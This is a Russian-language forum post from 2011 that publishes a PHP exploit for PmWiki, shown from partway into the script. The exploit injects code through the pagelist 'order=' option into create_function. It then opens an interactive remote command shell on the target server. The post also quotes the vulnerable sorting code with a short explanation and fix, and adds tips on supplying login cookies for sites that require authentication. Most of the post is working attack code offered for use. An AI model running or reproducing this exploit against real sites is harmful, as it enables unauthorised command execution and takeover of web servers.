
27.11.2011, 19:46
PmWiki
Exploit:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] \n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\nExample....: php[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]localhost /"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\nExample....: php[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]localhost /pmwiki/\n"[/COLOR][COLOR="#007700"];
die();
}
[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$phpcode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"']);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD]));print(___);die;#"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$payload[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"action=edit&post=save&n=Cmd.Shell&text=(:pagelist order=[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$phpcode[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]:)"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"POST[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]pmwiki.php HTTP/1.0\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Length: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$payload[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: application/x-www-form-urlencoded\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Connection: close\r\n\r\n[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$payload[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
if (![/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/Location/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]http_send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]))) die([/COLOR][COLOR="#DD0000"]"\n[-] Edit password required?!\n"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"POST[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]pmwiki.php HTTP/1.0\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Cmd: %s\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Length: 11\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: application/x-www-form-urlencoded\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Connection: close\r\n\r\nn=Cmd.Shell"[/COLOR][COLOR="#007700"];
while([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
print[/COLOR][COLOR="#DD0000"]"\npmwiki-shell# "[/COLOR][COLOR="#007700"];
if (([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]STDIN[/COLOR][COLOR="#007700"]))) ==[/COLOR][COLOR="#DD0000"]"exit"[/COLOR][COLOR="#007700"]) break;
[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http_send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]base64_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"])));
[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/\n\r\n(.*)___/s"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]) ? print[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] : die([/COLOR][COLOR="#DD0000"]"\n[-] Exploit failed!\n"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
Уязвимый код (имя поля сортировки $o из опции order= подставляется в строку для create_function без какой-либо проверки, поэтому одиночная кавычка в нём закрывает строковый литерал и остаток попадает в выполняемый код; защита — до подстановки допускать в $o только символы имени поля, например буквы, цифры и подчёркивание):
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
foreach([/COLOR][COLOR="#0000BB"]$opt[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'=order'[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]) {
if (@[/COLOR][COLOR="#0000BB"]$PageListSortCmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"\$c =[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$PageListSortCmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]; "[/COLOR][COLOR="#007700"];
else
[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"\$c = @strcasecmp(\$PCache[\$x]['[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#DD0000"]'],\$PCache[\$y]['[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#DD0000"]']); "[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"if (\$c) return[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#DD0000"]\$c;\n"[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]StopWatch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PageListSort sort'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]uasort[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$list[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]create_function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'$x,$y'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"global \$PCache;[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#DD0000"]return 0;"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]StopWatch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PageListSort end'[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
P.S. Без авторизации проходит только на нескольких сайтах, а на остальных нужно авторизоваться и добавить в пакет ваш User-Agent и Cookie. Т.е.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"User-Agent: bla-bla\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Cookie: blabla=6gui67gg7t76rf7iiiirvr76r67v\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
Кто допер, тот допер...